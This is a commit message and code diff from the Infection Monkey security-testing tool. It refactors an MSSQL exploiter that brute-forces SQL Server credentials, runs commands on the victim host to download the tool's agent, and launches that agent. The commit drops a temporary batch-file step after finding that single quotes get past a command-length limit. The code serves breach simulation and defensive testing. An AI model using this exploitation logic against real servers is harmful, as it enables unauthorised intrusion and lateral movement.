Agent: Remove MSSQL temporary file and directory

This temporary file was only needed when commands were subject to 128
character limit. Writing commands to a batch file and executing it was a
way to run larger commands. Now that we know single quotes circumvent
this limit, the temporary file and directory are no longer necessary.

monkey/infection_monkey/exploit/mssqlexec.py

@@ -28,10 +28,6 @@ class MSSQLExploiter(HostExploiter):
     QUERY_BUFFER = 0.5
     SQL_DEFAULT_TCP_PORT = "1433"
 
-    # Temporary file that saves commands for monkey's download and execution.
-    TMP_FILE_NAME = "tmp_monkey.bat"
-    TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
-
     # Single quotes are escaped in SQL by using two of them.
     # Example: 'It ain''t over ''til it''s over'
     AGENT_DOWNLOAD_COMMAND = (
@@ -43,7 +39,6 @@ class MSSQLExploiter(HostExploiter):
         super().__init__()
         self.cursor = None
         self.agent_http_path = None
-        self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
 
     def _exploit_host(self) -> ExploiterResultData:
         agent_path_on_victim = get_agent_dst_path(self.host)
@@ -67,10 +62,8 @@ class MSSQLExploiter(HostExploiter):
             return self.exploit_result
 
         try:
-            self._create_temp_dir()
             self._upload_agent(agent_path_on_victim)
             self._run_agent(agent_path_on_victim)
-            self._remove_temp_dir()
         except Exception as e:
             error_message = (
                 f"An unexpected error occurred when trying "
@@ -145,17 +138,10 @@ class MSSQLExploiter(HostExploiter):
             "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
         )
 
-    def _create_temp_dir(self):
-        logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}")
-
-        mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}"
-        self._run_mssql_command(mkdir_command)
-
     def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
         http_thread = self._start_agent_server(agent_path_on_victim)
 
-        self._write_download_command_to_batch_file(agent_path_on_victim)
-        self.run_payload_file()
+        self._run_agent_download_command(agent_path_on_victim)
 
         MSSQLExploiter._stop_agent_server(http_thread)
 
@@ -165,20 +151,11 @@ class MSSQLExploiter(HostExploiter):
         )
         return http_thread
 
-    @staticmethod
-    def _stop_agent_server(http_thread: LockedHTTPServer):
-        http_thread.stop()
-        http_thread.join(LONG_REQUEST_TIMEOUT)
-
-    def _write_download_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath):
+    def _run_agent_download_command(self, agent_path_on_victim: PureWindowsPath):
         agent_download_command = MSSQLExploiter.AGENT_DOWNLOAD_COMMAND.format(
             http_path=self.agent_http_path, dst_path=str(agent_path_on_victim)
         )
-        self._write_command_to_batch_file(agent_download_command)
-
-    def _write_command_to_batch_file(self, command: str):
-        write_to_file_command = f"<nul set /p={command}>{self.payload_file_path}"
-        self._run_mssql_command(write_to_file_command)
+        self._run_mssql_command(agent_download_command)
 
     def _run_mssql_command(self, command: str):
         logger.debug(f"Running command on SQL Server: {command}")
@@ -188,16 +165,14 @@ class MSSQLExploiter(HostExploiter):
 
         sleep(MSSQLExploiter.QUERY_BUFFER)
 
-    def run_payload_file(self):
-        self._run_mssql_command(str(self.payload_file_path))
+    @staticmethod
+    def _stop_agent_server(http_thread: LockedHTTPServer):
+        http_thread.stop()
+        http_thread.join(LONG_REQUEST_TIMEOUT)
 
     def _run_agent(self, agent_path_on_victim: PureWindowsPath):
-        self._write_agent_launch_command_to_batch_file(agent_path_on_victim)
-        self.run_payload_file()
-
-    def _write_agent_launch_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath):
         agent_launch_command = self._build_agent_launch_command(agent_path_on_victim)
-        self._write_command_to_batch_file(agent_launch_command)
+        self._run_mssql_command(agent_launch_command)
 
     def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
         agent_args = build_monkey_commandline(
@@ -205,7 +180,3 @@ class MSSQLExploiter(HostExploiter):
         )
 
         return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
-
-    def _remove_temp_dir(self):
-        self._run_mssql_command(f"del {self.payload_file_path}")
-        self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}")